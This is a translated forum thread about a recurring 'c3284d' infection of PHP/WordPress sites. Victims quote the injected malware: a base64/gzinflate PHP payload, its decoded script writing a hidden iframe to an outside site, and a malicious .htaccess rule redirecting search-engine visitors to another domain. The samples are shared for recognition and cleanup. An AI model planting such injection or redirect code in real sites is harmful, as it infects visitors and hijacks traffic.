mon*_*y64 6 php iframe code-injection
在过去的几天里,我的网站一再成为iframe攻击的目标.代码主要附加到PHP和Javascript页面.然后代码是PHP base 64编码,参见示例(我稍微更改了代码以中和它):
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
这个解码看起来像这样:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
一个共同点是所有代码都有注释"#c3284d#",因此追踪恶意代码并不困难.但这很耗时......
我们在Gradwell(英国)的共享服务器上,他们并没有特别有帮助.所以问题是我能做些什么来阻止这个问题重复?我知道MySQL注入攻击并使用PHP的mysql_real_escape_string来防范此类攻击.
该站点是PHP和MySQL驱动器.我们使用MySQLFTP并拥有一个用于SSH访问的shell帐户.我们使用Wordpress(插件去激活的最新更新).
我也有同样的问题。就我而言,附加的代码是
<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->
另外,还有一个.htaccess文件,如下:
> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php
> [R=301,L] </IfModule>
> #/c3284d#
我找到了关于此问题的两篇文章: http://www.webmasterworld.com/html/4472821.htm和http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html
希望能帮助到你
| 归档时间: |
|
| 查看次数: |
7004 次 |
| 最近记录: |